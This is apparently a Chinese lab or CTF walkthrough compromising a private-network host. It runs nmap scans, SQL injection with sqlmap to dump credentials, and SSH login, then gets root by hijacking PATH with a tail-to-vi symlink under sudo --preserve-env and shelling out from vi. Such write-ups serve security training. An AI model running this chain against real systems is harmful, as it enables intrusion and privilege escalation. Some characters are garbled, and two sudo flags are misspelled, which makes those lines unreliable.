主機發(fā)現(xiàn)

sudo nmap -sT --min-rate 10000 -p- 192.168.28.32 -oA nmapscan/ports

sudo nmap -sT -sC -sV -O -p22,8080 192.168.28.3 -oA nmapscan/detail

sudo nmap -sU --top-ports 20 192.168.28.3　-oA nmapscan/udp

(相關(guān)資料圖)

sudo nmap --script=vuln -p22,8080 192.168.28.3 -oA nmapscan/vuln

訪問http網(wǎng)頁

同時進行爆破目錄

sudo dir -u http://xx -w xx

訪問網(wǎng)頁時必須要讀全todolist,根據(jù)開發(fā)習慣和交互行問推斷技術(shù)和可能的漏洞

根據(jù)提示不斷點擊發(fā)現(xiàn)一個具有數(shù)字id的提示

利用這個進行sqlmap跑看看能否跑出

sudo sqlmap -u http://xx.xx.xx.xx:8080/mercuryfacts/1 --dbms mysql --dbs --batch#跑出數(shù)據(jù)庫

獲得用戶密碼

發(fā)現(xiàn)賬戶密碼嘗試ssh登錄

ssh@xx.xx.xx.xx

成功getshell

權(quán)限查看

whoami　　uname -a　　lsb_release -a(內(nèi)核版本)　　ip a　　sudo -l　　cat /etc/crontab

查看家目錄是否有flag同時發(fā)現(xiàn)一個目錄

進入此目錄并查看txt發(fā)現(xiàn)了賬號和base64加密的密碼對linuxmaster賬戶的密碼進行解密

切換的linuxmaster用戶

su linuxmaster　　xx

查看whoami　　ip a　　　sudo -l　　cat /etc/crontab

sudo -l

利用root賬號需要設(shè)置一個環(huán)境變量才能執(zhí)行check_syslog.sh這個腳本

查看check_syslog.sh的腳本

可以發(fā)現(xiàn)是tail命令運行

通過路徑優(yōu)先查找的方式進行提權(quán)

1.用戶家目錄設(shè)置軟連接

ln -s /bin/vi tail

2.將當前路徑設(shè)置為環(huán)境變量

export PATH=.:$PATH

#驗證

echo $PATH

3.根據(jù)SETENV設(shè)置環(huán)境變量并執(zhí)行腳本

sudo --preserver-env=PATH /usr/bin/check_syslog.sh

sudo的SETENV標記表示允許用戶設(shè)置環(huán)境變量，而--preserve-env選項表示保留當前環(huán)境變量并傳遞給執(zhí)行的命令

sudo --preverse-env=PATH /usr/bin/check_syslog.sh

成功執(zhí)行了腳本,因為tail在環(huán)境變量中指向的時/bin/vi所以成功打開了一個vi界面

在vi界面進行提權(quán)的語句時 :!bash

成功提權(quán)

關(guān)鍵詞：

責任編輯：Rex_04